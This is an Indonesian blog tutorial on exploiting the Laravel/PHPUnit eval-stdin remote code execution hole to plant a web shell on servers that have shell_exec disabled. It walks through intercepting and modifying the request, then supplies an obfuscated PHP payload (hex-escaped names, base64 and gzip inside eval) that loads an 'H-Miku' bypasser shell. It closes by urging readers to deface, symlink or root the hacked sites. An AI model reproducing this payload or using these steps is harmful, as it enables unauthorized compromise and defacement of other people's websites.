Cara Simple Bypass RCE Laravel Tidak Bisa Shell Command (Shell Upload)

Oke pada postingan kali ini saya akan sharing tutorial yang masih berhubungan dengan Exploit RCE pada Laravel Framework, bisa anda baca DISINI , oleh karena itu masih juga ada yang bingung kenapa tidak bisa upload shell (Blank terus). Tetapi tanpa kalian ketahui sebenarnya bahwa fungsi

eval(‘?>’ . file_get_contents(‘php://stdin’));

pada file eval-stdin mengizinkan kita menjalankan tulisan kode apapun yang kita mau (Termasuk PHP), jadi disini saya tidak akan menggunakan fungsi shell_exec karena saya yakin tidak semua server mengaktifkan shell_exec, lagipula PoC yang masih Viral ini kemungkinan masih ada puluhan hingga ratusan web yang vuln sehingga peluangnya 50%. Dan baiklah daripada lama langsung saja kita menuju ke pembahasan.

1. Pertama buka file eval-stdin (Sebelumnya nyalakan intercept dulu)

2. Kemudian kita modify request tersebut dengan memasukan apapun (bebas) sebagai contoh admin masukan 12345 dan jika ter eksekusi dengan sempurna alias vuln akan seperti berikut

3. Kemudian kita modify requestnya lagi dengan memasukan kode PHP berikut

<?php 

// Script memanggil Bypasser H-Miku
// Created by Exp3ct0v!z

$cgtstat="\x69\x7au\x6di";$olslggyibkyc="\x69z\x75m\x69";
${$cgtstat}="eJ\x789\x55tF\x752j\x41UfR4\x53/3Bl\x49S\x56oQ\x49\x43qLz\x52Bm\x69\x6ad\x55\x4ct\x52t\x61\x6d0P\x53HH\x4fN\x68KsD\x33\x62LJSp/z4\x37\x4a\x4bxP\x6a\x65TI\x50\x6a669\x35\x7a\x720y\x75\x35K\x43CBg\x46\x6d\x72\x5alGk\x73L\x450\x34\x32JE5\x44\x37\x53u\x49\x72\x75\x6e\x39\x67X\x51\x58/+\x43\x6d\x36\x36n\x5a\x37Ae\x30\x77\x4fN\x54\x397\x56\x61e\x52Yqr\x47c+\x57gXCo\x71wpYz\x67KD\x36\x48P\x54dLc/D\x6dpA4Ci\x34\x4e7\x66/tdsB9lm\x6c\x5a\x67\x61A\x56LI+\x45Ks\x75\x6cCI\x4f\x76\x47\x44\x4a\x753\x4f9Q\x34B\x6bEMI\x4b2\x6f\x43/\x315noR5\x6eqRg\x79\x343X\x48\x41b9\x72w\x42\x661\x64\x44hl\x71pHE\x6a\x59\x41\x42Y\x76\x54\x77/r\x783\x52\x7a\x743\x70\x59\x44sB\x4a+\x4a\x43\x56rr4\x76\x31\x79/\x70AKb\x6aC4\x38eK\x66Gs\x78\x73U\x5a01rIGv\x7aIR\x30u\x56+k\x78\x74\x74\x42uL\x37c\x47I\x56\x39xa\x32FHLRS7/\x53\x31\x6e\x39u\x46tvvq\x58\x70\x342\x61xv\x6c1e\x6c\x4aBSG\x74pK\x79\x5a\x76\x54\x32ZE\x667\x37u\x36\x69T\x4dw\x62q\x56RwiQ\x45s\x53\x47\x61KzsH\x58\x46\x4a\x74Q/\x528\x32\x47\x49G\x47d\x55\x4dG\x31\x37Cls\x4eC\x6crS\x41\x32\x52/\x55v\x34\x45\x34a\x75\x67xoc\x4aS\x50e\x392P\x73\x57Z\x6e\x76vlt3\x79/A\x36\x4e\x4a\x67n\x78ij\x49\x73\x4dH/\x45\x73c\x33m\x4aTtNJQ\x55\x36/I\x32\x31\x4fQ8\x57\x4a\x77d\x6f\x4f\x789\x66\x44q/Fw\x4d\x72\x31y\x71\x6b\x5aK7B\x42\x55fGt\x5a\x67\x71\x62XY\x33\x56E\x6c6q+A\x51a\x6da\x5a6\x67Nl\x6f\x49LN\x5a\x75Q\x67\x6e\x61ZCUWB\x5ap\x44\x7a\x43Zzu\x43\x39\x35A\x62f\x63\x75P\x643a\x68\x30\x53\x529\x69t\x52\x714\x505B\x74Q\x467T3\x51\x30\x44\x509Y\x68m\x67H\x79\x6bL\x76\x50\x793H+\x76\x6eOy\x6d";eval(gzuncompress(base64_decode(${$olslggyibkyc})));
?>

4. Kemudian maka jika sukses akan muncul seperti berikut

5. Setelah itu klik disini aja

6. Maka Bypasser sudah terpanggil sempurna

Bisa kalihan lihat diatas bahwa fungsi exec dimatikan, tetapi kita masih bisa mengupload Bypasser H-Miku 😀 setelah itu terserah kalian mau di deface, symlink, root, dll

Leave a Reply

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *